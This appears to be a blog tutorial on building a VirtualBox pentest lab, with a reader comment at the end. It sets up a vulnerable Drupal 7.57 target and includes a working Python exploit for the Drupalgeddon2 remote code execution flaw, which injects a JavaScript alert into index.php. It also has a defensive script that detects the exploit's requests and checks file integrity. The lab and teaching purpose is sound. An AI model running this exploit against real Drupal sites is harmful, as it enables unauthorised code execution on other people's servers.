As a penetration tester it is important to have a controlled environment in which to hone your skills and test new techniques. Testing on systems you do not own is illegal, even if it is just harmless curiosity. In this article I will show you how to build a virtual penetration testing lab using VirtualBox, Kali Linux, and Ubuntu.
In this lab you can test and hack away without worrying about the men in black showing up at your door. Plus, in a virtual environment you can carefully monitor each system’s behavior during an attack, giving you further insight into how an exploit compromises a system.
In addition, with a virtual network you can clone and snapshot instances with just a few clicks and easily create new pre-configured hosts. This allows you to try many different techniques in a short period of time, and always start from the same base configuration.
Below are the steps we will take to create the virtual penetration testing lab.
- Install VirtualBox
- Set up the Virtual Network
- Create the Kali Host
- Build the Base Ubuntu Image
- Hacking Drupal
- Benefits of a Virtual Penetration Testing Lab
- Something Extra
Install VirtualBox
First, you will want to grab a copy of VirtualBox and run through the installation for your OS. VirtualBox is a fantastic virtualization tool and provides a rich feature set for operating virtual machines.
Our entire virtual penetration testing lab will be hosted in VirtualBox. This keeps the host system nice and tidy. Most PCs these days can easily support 2 or even 3 Linux guest VMs, each hosting a simple web server, for example.
VirtualBox also provides snapshot capabilities allowing VM states to be stored and recalled with the click of a button.
Set up the Virtual Network
Once we’ve got VirtualBox installed we need a network for our machines to live on. To keep the lab isolated we will want the machines to be restricted to a dedicated private network. VirtualBox makes this easy with the NAT Network. With a NAT Network all of our lab machines can easily communicate with one another while also having NATed access to the Internet.
If you haven’t set up a NAT Network before read on below. It is a little different from the other VirtualBox networking options but I will show you how to set up a NAT Network in VirtualBox.
First you will need to create the network itself. This is done under VirtualBox > Preferences. Select the Network tab and then add a new network.
Double-clicking the newly created network allows you to configure the subnet IP range, the name of the network, and DHCP options. For now the defaults are fine but go ahead and rename the network if you wish.
I like the NAT Network option best as it provides each of the VMs with a NATed Internet connection. It also places each of the VMs on the same private network allowing our lab machines to easily communicate with one another. Now let us fill our penetration testing lab with some machines.
Create the Kali Host
Kali Linux is a fantastic distribution loaded with all sorts of penetration testing tools. I like to have a Kali host on my lab network either for launching attacks or fingerprinting hosts.
Kali is a breeze to install with the pre-made VirtualBox image. Follow our in-depth tutorial to Install Kali Linux in VirtualBox on Mac. Check that guide out if you need some extra help, otherwise the basic steps are listed below.
Download the Kali VirtualBox image from the Offensive Security downloads page.
The downloaded file is a VirtualBox appliance file. After the download completes, open VirtualBox and select File > Import Appliance…
The default user for the appliance is root with a default password of toor.
Now let us add some targets to the lab network.
Build the Base Ubuntu Image
Ideally we want the virtual pentesting lab to be as reusable as possible. I use VirtualBox appliances for this. An appliance packages up your virtual machine as a single file including all the machine settings and the current machine state. This appliance file can be imported as many times as needed to create a new virtual machine.
I use Ubuntu for this base machine. Ubuntu is widely supported and easy to configure.
Let's start by setting up a base Ubuntu virtual machine, and then I will show you how to create an appliance out of it.
Download Ubuntu
Download the Ubuntu ISO. The minimal version is fine, but grab the standard version if you prefer a full graphical desktop.
Create the VM
While the ISO is downloading, create a new virtual machine.
Once the ISO has downloaded, insert it into the virtual machine.
Install Ubuntu
Start the VM and run through the Ubuntu installation process. For a base box most of the defaults are fine and give you a clean minimal Ubuntu installation.
There are plenty of installation tutorials available for Ubuntu and VirtualBox so I won’t go into detail here. Google is your friend.
Remember, you’ll only have to step through this installation once!
Tweak the Machine
At this point you could stop and create an appliance. However you may also wish to perform a few more customizations for your base appliance.
For example, you could install your preferred text editor (mine’s vim!), install a default set of base packages, or just customize the shell prompt.
Export the Appliance
Once you have finished tweaking your base box it is time to export the appliance. This is as simple as File > Export Appliance. Tweak any options, and put this file somewhere for later.
Now whenever you need a new host in the lab, you can import this appliance. This will save you considerable time as you won’t have to go through the same initial configuration over and over for each host.
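The network, import, and snapshot steps above can also be driven from the command line. The script below is an added example, not code from the original article; it assumes VBoxManage is on your PATH, that the appliance you just exported was saved as ./ubuntu-base.ova, and uses the placeholder names PentestLab, drupal-target and the 10.0.2.0/24 subnet, all of which you should adjust. It goes one step beyond the text by also switching on VirtualBox's per-NIC packet trace, which writes a pcap file you can open in Wireshark later.

```shell
#!/bin/sh
# Added example (not from the original article): provision the lab from the
# command line with VBoxManage instead of clicking through the GUI.
# Assumptions: VBoxManage is on PATH; the appliance exported above was saved
# as ./ubuntu-base.ova; names PentestLab / drupal-target and the 10.0.2.0/24
# subnet are placeholders. Set DRY_RUN=1 to print commands instead of running.

VBOX="${VBOXMANAGE:-VBoxManage}"

# Execute a command, or just echo it when DRY_RUN is set.
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# Create an isolated NAT Network with DHCP: guests get private addresses and
# NATed Internet access, but nothing outside the lab can initiate connections
# to them.
create_lab_network() {
    netname="$1"; cidr="$2"
    run "$VBOX" natnetwork add --netname "$netname" --network "$cidr" --enable --dhcp on
}

# Import the base appliance as a new VM, attach NIC 1 to the lab network and
# take a "clean" snapshot so every experiment starts from the same state.
import_lab_vm() {
    vmname="$1"; ova="$2"; netname="$3"
    run "$VBOX" import "$ova" --vsys 0 --vmname "$vmname"
    run "$VBOX" modifyvm "$vmname" --nic1 natnetwork --nat-network1 "$netname"
    run "$VBOX" snapshot "$vmname" take clean --description "fresh import"
}

# Have VirtualBox write everything crossing NIC 1 to a pcap file that Wireshark
# can open. This works for any attachment type, NAT Network included.
enable_nic_trace() {
    vmname="$1"; pcap="$2"
    run "$VBOX" modifyvm "$vmname" --nictrace1 on --nictracefile1 "$pcap"
}

# Roll a powered-off VM back to its clean snapshot after an experiment.
restore_clean() {
    run "$VBOX" snapshot "$1" restore clean
}

main() {
    create_lab_network PentestLab 10.0.2.0/24
    import_lab_vm drupal-target ./ubuntu-base.ova PentestLab
    enable_nic_trace drupal-target ./drupal-target.pcap
    run "$VBOX" startvm drupal-target --type headless
}

# Only provision when asked explicitly (sh lab.sh provision), so the functions
# can also be sourced and reused one at a time.
if [ "${1:-}" = "provision" ]; then
    main
fi
```

Run it once with DRY_RUN=1 to review the exact VBoxManage calls before letting it touch your VirtualBox configuration; after an experiment, restore_clean drupal-target puts the target back to the state it was imported in.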
Hacking Drupal
That is pretty much all we need for a basic penetration testing lab. We have a master host for launching and monitoring attacks. We have also created a reusable base appliance for easily creating test targets.
Now I will run through an example exploit using our new penetration testing lab. I will demonstrate one of the Drupalgeddon vulnerabilities that were discovered in early 2018. You may want to start by reading the analysis of the vulnerability.
For this example we will set up a base web server running a vulnerable Drupal installation.
We will then use a simple Python script on the Kali host and exploit the vulnerability.
Creating the Target Host
If you don’t have any Ubuntu VMs running, grab your appliance and spin up a new VM. Log in to your target virtual machine to begin the setup.
The Drupalgeddon vulnerability came out quite some time ago, and the vulnerable Drupal 7.57 release needs PHP 5.6, which is no longer in Ubuntu's default repositories, so we will need to add a repository first. Run these commands as root (or prefix them with sudo).
# Install the php5.6 repository
apt-get install software-properties-common
add-apt-repository ppa:ondrej/php
apt-get update
# Install the php5.6 packages (pulls in the Apache PHP module)
apt-get install php5.6 php5.6-gd php5.6-xml php5.6-mysql php5.6-mbstring
Now we can install the Apache web server and the MySQL database.
# Install Apache and MySQL
apt install apache2
apt install mysql-server
# Restart apache2
service apache2 restart
# Restart mysql
service mysql restart
# Secure mysql installation
mysql_secure_installation
Now let’s create the database and user.
# Use the mysql command to enter the mysql console (as root this uses socket authentication)
mysql
# Then create the database and user. The user's password is set once, in CREATE USER;
# IDENTIFIED BY inside GRANT is deprecated in MySQL 5.7 and rejected by MySQL 8.
mysql> CREATE DATABASE databasename CHARACTER SET utf8 COLLATE utf8_general_ci;
mysql> CREATE USER 'username'@'localhost' IDENTIFIED BY 'password';
mysql> GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER, CREATE TEMPORARY TABLES ON databasename.* TO 'username'@'localhost';
After we have installed the required packages, we can begin to install Drupal.
Simply download and extract the Drupal archive, and then pull up the site in a browser to complete the installation.
cd /var/www/html/
wget https://ftp.drupal.org/files/projects/drupal-7.57.tar.gz
tar -xzvf drupal-7.57.tar.gz
cd /var/www/html/drupal-7.57/
cp sites/default/default.settings.php sites/default/settings.php
cd /var/www/html/
chown -R www-data:www-data drupal-7.57/
If you need the private IP of the server you can use the following command.
# Get the server private IP (ifconfig lives in the net-tools package; ip addr works too)
ifconfig
Now navigate to the IP of your VM in a browser. You should be greeted by the Drupal installation page.
Once you reach the database configuration page, enter the database user details for the user you created earlier.
After the installer is complete you can check out your fresh new homepage.
If we check the status report, we can see that we are in fact running Drupal 7.57. Now let us have some fun with this!
Exploiting the Target
Now that we have a vulnerable target set up, let us get to work exploiting it.
The following is a simple Python script that will exploit the vulnerability and demonstrate remote code execution. Be sure to check out the vulnerability analysis if you aren’t sure how the script works.
This vulnerability gives us the ability to execute arbitrary code on the target server. We could use this to do some pretty nasty things, but let's just make a tiny modification to index.php.
The shell_code variable holds the code that we are injecting into index.php. This is just a simple JavaScript alert that will show any time the page is loaded. I’ll leave it up to you to see what else you can do with this vulnerability.
#!/usr/bin/env python3
import requests
import re
import base64

# Address and Drupal path of the target VM in the lab (adjust to your VM's IP)
target = '192.168.56.9/drupal-7.57'
shell_code = "echo \"<script>alert('Ouch. Time to patch. ');</script>\";"
encoded_cmd = base64.b64encode(shell_code.encode()).decode()
bashcmd = "echo " + encoded_cmd + " | base64 -d >> index.php"
print(bashcmd)
target_url = '/?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=' + bashcmd
payload = "form_id=user_pass&_triggering_element_name=name"
url = 'http://' + target + target_url
url = url.replace('#', '%23')
url = url.replace(' ', '+')
print(url)
headers = {'content-type': 'application/x-www-form-urlencoded'}
r = requests.post(url, headers=headers, data=payload)
body = r.text
# Extract form id from body
m = re.search('form_build_id" value="(form-[^"]+)"', body)
form_build_id = m.group(1)
trigger_url = 'http://' + target + '/?q=file/ajax/name/#value/' + form_build_id
trigger_url = trigger_url.replace('#', '%23')
trigger_url = trigger_url.replace(' ', '+')
payload = "form_build_id=" + form_build_id
# Trigger the exploit
r = requests.post(trigger_url, headers=headers, data=payload)
Run the script and head on over to your browser. You should see the JavaScript alert pop up when the page reloads.
And there you have it. We’ve just exploited Drupal in our virtual penetration testing lab.
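Since the lab also lets you watch the target, here is an added example from the defender's side (not part of the original article) of two checks worth running on the Drupal VM after exercising the script: a grep over Apache's access log for the two request shapes the script sends (the '#' it rewrites to '%23' appears literally in the logged URL), and a sha256 baseline of the Drupal tree that flags the line the payload appends to index.php. The log lines and files are constructed inline so it runs anywhere; mktemp -d and either sha256sum or shasum are assumed to be available.

```shell
#!/bin/sh
# Added example, not part of the original article: two checks a defender can
# run on the Drupal target after the script above has been exercised.
#  1. Scan Apache's access log for the request shapes the script sends.
#  2. Compare the Drupal tree against a sha256 baseline taken right after
#     installation, which catches the line the demo payload appends to index.php.
# Sample log lines and files are constructed here; nothing is read from a real
# server. mktemp -d is assumed to be available.

# Apache logs the raw request line, so the '#' that the script rewrites to
# '%23' shows up literally. Both stages of the attack are covered.
DG2_PATTERN='(q=user/password.*%23(post_render|type|markup)|q=file/ajax/.*%23value)'

# Print every access-log line matching the pattern (exit 0 even with no hits).
detect_drupalgeddon2() {
    grep -Ei -- "$DG2_PATTERN" "$1" || true
}

# Use GNU sha256sum where present, otherwise the perl shasum shipped with macOS.
sha256_tool() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$@"
    else
        shasum -a 256 "$@"
    fi
}

# Hash every PHP file under a web root ($1) into a baseline file ($2, absolute
# path). Take this immediately after a clean install, before exposing the site.
record_baseline() {
    ( cd "$1" && find . -type f -name '*.php' | LC_ALL=C sort |
        while IFS= read -r f; do sha256_tool "$f"; done ) > "$2"
}

# Re-check the tree: prints changed files, returns non-zero if anything differs.
# (Files added after the baseline are not covered; diff a fresh listing for that.)
check_integrity() {
    ( cd "$1" && sha256_tool -c --quiet "$2" )
}

# Constructed access-log sample: a normal page view, the two requests the
# script above sends, and a legitimate password-reset form load.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.2.15 - - [10/Jan/2019:10:00:01 +0000] "GET /drupal-7.57/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Jan/2019:10:00:05 +0000] "POST /drupal-7.57/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo+test HTTP/1.1" 200 7423 "-" "python-requests/2.18.4"
10.0.2.15 - - [10/Jan/2019:10:00:06 +0000] "POST /drupal-7.57/?q=file/ajax/name/%23value/form-AbCdEf HTTP/1.1" 200 312 "-" "python-requests/2.18.4"
10.0.2.16 - - [10/Jan/2019:10:01:00 +0000] "GET /drupal-7.57/?q=user/password HTTP/1.1" 200 4010 "-" "Mozilla/5.0"
EOF
}

demo() {
    tmp="$(mktemp -d)"
    write_sample_log "$tmp/access.log"
    echo "suspicious requests:"
    detect_drupalgeddon2 "$tmp/access.log"

    # Constructed web root: record a baseline, then append to index.php the way
    # the demo payload does, and re-check.
    mkdir -p "$tmp/www"
    printf '<?php echo "index";\n' > "$tmp/www/index.php"
    printf '<?php // settings\n' > "$tmp/www/settings.php"
    record_baseline "$tmp/www" "$tmp/baseline.sha256"
    printf '<script>alert(1)</script>\n' >> "$tmp/www/index.php"
    if check_integrity "$tmp/www" "$tmp/baseline.sha256"; then
        echo "integrity: unchanged"
    else
        echo "integrity: MODIFIED (see file above)"
    fi
    rm -rf "$tmp"
}

demo
```

On the real target you would point detect_drupalgeddon2 at /var/log/apache2/access.log and take the baseline from /var/www/html/drupal-7.57 straight after the installer finishes; the legitimate password-reset request in the sample shows why matching on the form path alone is not enough, the %23 keys are the distinguishing signal.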
Benefits of a Virtual Penetration Testing Lab
We’ve already covered how easy it is to create and snapshot hosts. We can also use Wireshark to monitor network traffic on our lab network.
To do this, open Wireshark on your host machine (the one running VirtualBox). After that, select the NAT Network you created (mine is named vboxnet0) from the available interfaces list.
Wireshark now shows you all the traffic passing between your lab machines. This is extremely useful when debugging an exploit, or assessing a vulnerability.
Something Extra
The best part of a virtual penetration testing lab is the versatility it provides.
Metasploitable2 is a vulnerable virtual machine that can easily be added to your lab.
I go through the installation process in my article: How to Install Metasploitable in VirtualBox
Or you can grab the download on Sourceforge.
Great article K! Keep these coming. I have used VirtualBox for a number of years with success. Question: Do you use the machine as a dedicated virtual server for test VMs or test the virtual machines from the host? This may not be the place to put this, but I would like to see an article from you that outlines the top 5 or 10 tools that every InfoSec professional should know and why. I would also like to see a post about how to get started in the InfoSec community and what you need to know to be relevant in the field. And finally, I would like you to do an article that outlines a successful pentest attack in a lab environment speaking specifically as to why you did it and what it accomplished. As you can tell, I am a noob and respect the knowledge that you have attained over the years. It is hard to start out because very few people believe in the concept of security by offense. Schools don’t teach it and it makes for an unprepared and irrelevant security professional that can spit out theory as if it was application. Thanks again K! I look forward to your next post!